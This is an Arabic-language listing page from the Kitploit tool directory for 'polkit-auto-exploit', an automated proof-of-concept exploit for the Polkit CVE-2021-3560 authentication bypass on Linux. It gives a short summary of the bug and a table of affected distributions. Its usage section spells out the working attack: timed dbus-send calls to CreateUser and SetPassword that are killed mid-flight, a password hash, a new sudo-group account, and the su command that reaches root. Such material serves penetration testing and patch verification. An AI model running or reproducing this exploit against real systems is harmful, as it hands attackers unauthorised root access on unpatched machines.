Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
polkit-auto-exploit — استغلال تلقائي PoC لثغرة Polkit CVE-2021-3560 | Kitploit
أدوات/GitHubGitHub/aancw/polkit-auto-exploit
المصادقة والترخيصتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراق
GitHubaancw/polkit-auto-exploit

polkit-auto-exploit

استغلال تلقائي PoC لثغرة Polkit CVE-2021-3560

عرض المستودع
54منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

polkit-auto-exploit

استغلال تلقائي (PoC) لثغرة Polkit CVE-2021-3560

الملخص

CVE-2021-3560 هي ثغرة تجاوز للمصادقة في polkit، تسمح لمستخدم غير مميز باستدعاء طرق مميزة عبر DBus. في هذا الاستغلال، سنستدعي طريقتين مميزتين توفرهما accountsservice (CreateUser وSetPassword)، مما يتيح لنا إنشاء مستخدم مميز ثم تعيين كلمة مرور له، وفي النهاية تسجيل الدخول باسم المستخدم المُنشأ ثم رفع الصلاحيات إلى root. https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/

الاستخدام

root@kitploit:~
ubuntu@ubuntu2004:~/polkit-auto-exploit$ ./polkit-auto-exploit -u adminhs -p admin1 -f admin
[===] Auto Exploitation PoC for Polkit CVE-2021-3560 by Petruknisme [===]
[+] Current User: ubuntu
[+] Variable for Polkit Configuration
[*] Username : adminhs
[*] Password : admin1
[*] Fullname : admin
[+] Sending create user command to determine time execution
[*] Execution time: 0.018076ms
[+] Time to killing dbus-send setting to 0.009038ms
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:adminhs string:'admin' int32:1 & sleep 0.009038s ; kill $!
..................
[+] GOTCHAAA! User adminhs is created with sudo member group
[+] Getting UID from user: 1015
[+] Creating password with OpenSSL
$5$wwCpZi2.onsiKa6b$B/OovlhfvFWs65EdYnk/1sL.sYSzfPXd1s6ZpurHNr0
[+] Triggering polkit to create password for adminhs
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1015 org.freedesktop.Accounts.User.SetPassword string:'$5$wwCpZi2.onsiKa6b$B/OovlhfvFWs65EdYnk/1sL.sYSzfPXd1s6ZpurHNr0' string:admin & sleep 0.009038s ; kill $!
Failed to execute command: echo admin1 | su -c id adminhs
uid=1015(adminhs) gid=1015(adminhs) groups=1015(adminhs),27(sudo)

[+] GOTCHAAA! Success login with User adminhs & password: admin1
[+] You can login to root using su with user and password created before: su -c 'sudo su' adminhs

تم الاختبار على

  • Ubuntu 20.04(policykit-1/focal,now 0.105-26ubuntu1)

معلومات

أي نظام مثبت عليه polkit إصدار 0.113 (أو أحدث) يكون معرضًا للخطر. يشمل ذلك توزيعات شائعة مثل RHEL 8 مع polkit إصدار 0.115 وUbuntu 20.04 مع polkit إصدار 0-105-26 (فرع Debian من polkit)

التوزيعات المعرضة للخطر

الترخيص

MIT License

تنزيل الأداة
التوزيعةمعرضة للخطر؟
RHEL 7لا
RHEL 8 نعم
Fedora 20 (أو إصدار أقدم)لا
Fedora 21 (أو إصدار أحدث) نعم
Debian 10 (“buster”)لا
Debian testing (“bullseye”) نعم
Ubuntu 18.04لا
Ubuntu 20.04 نعم